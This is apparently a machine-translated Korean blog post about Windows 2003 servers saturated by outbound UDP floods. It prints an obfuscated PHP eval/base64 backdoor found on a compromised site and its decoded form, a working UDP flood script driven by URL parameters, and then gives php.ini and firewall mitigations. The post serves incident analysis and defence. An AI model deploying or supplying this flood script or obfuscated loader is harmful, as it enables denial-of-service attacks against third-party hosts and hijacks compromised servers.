win2003 udp 공격으로 대역폭 차지

3063 단어
나중에 한 사이트에서 암호화된 것을 발견했다.복호화해서 익숙한udp를 보면 상관이 있는 거 아니야?역시 이런 상황에 처한 친구도 있다. 대외udp를 봉쇄하는 것이 필요한 것 같다.
다음은 게시글입니다.
최근 일부 서버의 UDP 공격에 대한 설명
요즘 서버 한두 대가 udp 공격을 많이 받는다고 하더라고요.
서버의 대역폭이 100%를 차지하게 되었고, 화방패로 데이터의 점용을 조사해도 구체적으로 어느 사이트가 공격당했는지 알 수 없다. 처음에는 cc공격인 줄 알았는데, iis대역폭을 멈추면 0이 되기 때문이다. 사실은 그렇지 않다. 모두 일부 사용자가 침입하여 발생한 것이다
다음은 침입의 원리를 말씀드리고 싶어요.
사용자 프로그램의 php 페이지 원본 코드:
/*
gl
*/
eval(gzinflate(base64_decode('
DZNHkqNIAADv85HpDg4tTGFidrYDCRBOOOEvG5gqrPBOvH77CRmZ+f3vP99DOfz6Bbek/SjOqkNtssCPNJkhTf2Xw
6zP4cdvIbfUZlQ1XhQchHDF3z39Ldpx33Lk9Xm78dUoCHeKfilO46tqg21DiEg+BCTz9QW/GD+lMGtThrSmdSEMLb
VkzvPt3s0UMS3mDx0WoG2nY+gB2L+fufDyzPU6gNJxAYSarbsanhimzJbUoqZuY0+lV4H6GZtDX9LxkE9L29swfGY
ibUTtUsoPqIRi7nFBpdmW0t5ECFWjzmfZe2xqERmtMLVpOqnY436BfrDxK10KYOfGAWN7s3geqB7RdV7WkxiBHZU4
wyW0LXsmyTdcdwk3TOjduh1F8cyvsgYuaejeLi23csLONsqDsU3gx60zLlm5XQ9jqhbyq949qvb2Us1dqsAGpYvfG
3IHY4TxaemBF2mKKY9StKJuDDHxfmI3z+eWa7OwlgvrxeB5Qz4AE2drfLAYmo6litZOUL1GxMlavOlDW8/OMb7ci1
3dLk1y9XDddGgA4onEBZ0vmx8aSWApy6q2JkpO0i8kg1qOx7EVPgEJNSOLyzZIW8ApDL+V0/0Fstph3qQI+1qQuCw
xiZH1aaTMKJItxW5rmz4WyrGmOKCUtLvAU2dle3a85a0GJJQWOGX5AnHiILQpplJ9mdpdQsw9TybO4whCCMqjfgOu
SJ+rRT+2Ok8rbc/oVd47v+J02tAy9fkMTP2u8HuUo1Ezp5F3XCMyL6ftJAkw+h+R1ljN0M0NYS/TXCpeY1tyOl7Aw
e8dP5ygq1VxAFoEKQD6EGdWsWMeBzSruEjIQeRbtgx0oRpw2CnKoxFs/KdiQauXc26QYtLSbeaxiAWLeq784jjWnu
bV2kpIarL4bMVgNxv+9QwM8j1FvNR1yGa9lVsF1hM63tSpymtn4k1QFEGLVowe93kyhxGbRpNXICoPk3oqbB6DL3c
hsJ4OwQk4FOIc2k4MQ3tKy/vfv78/Pz///Pr+Gfd/')));
N회 복호화 후 코드:
 
  
$packets = 0;
$ip = $_GET[\'ip\'];
$rand = $_GET[\'port\'];
set_time_limit(0);
ignore_user_abort(FALSE);
$exec_time = $_GET[\'time\'];
$time = time();
print \"Flooded: $ip on port $rand

\";
$max_time = $time+$exec_time;

for($i=0;$i<65535;$i++){
$out .= \"X\";
}
while(1){
$packets++;
if(time() > $max_time){
break;
}
$fp = fsockopen(\"udp://$ip\", $rand, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}
echo \"Packet complete at \".time(\'h:i:s\').\" with $packets (\" . round(($packets*65)/1024, 2) . \" mB) packets averaging \". round($packets/$exec_time, 2) . \" packets/s \
\";
?>


baidu는 작업 원리를 설명했습니다.
먼저 당신의 코드를 정상적인 웹 페이지에 넣으세요.
URL을 통해 IP와 포트를 udp로 전달합니다.서버에 파일을 전송하여 작성합니다.
이렇게 하면 서버가 당첨된다.
즉, 서버에서 udp 공격을 표시하는데 대역폭이 매우 심각하다. 기본적으로 100%이고 일반적으로 97%-99% 사이를 배회한다
솔루션:
php에 있습니다.ini에서 php용 네트워크를 제한합니다.
php에 있습니다.ini에서 값을 Off로 설정
allow_url_fopen = Off
그리고:
;extension=php_sockets.dll
앞의번호는 반드시 있어야 한다. 즉, sockets를 제한하는 것이다.dll
IIS 재부팅
나는 이 함수를 끄지 않았다. 어떤 프로그램은 마치udp 출구 포트를 봉쇄해야 할 것 같다.

좋은 웹페이지 즐겨찾기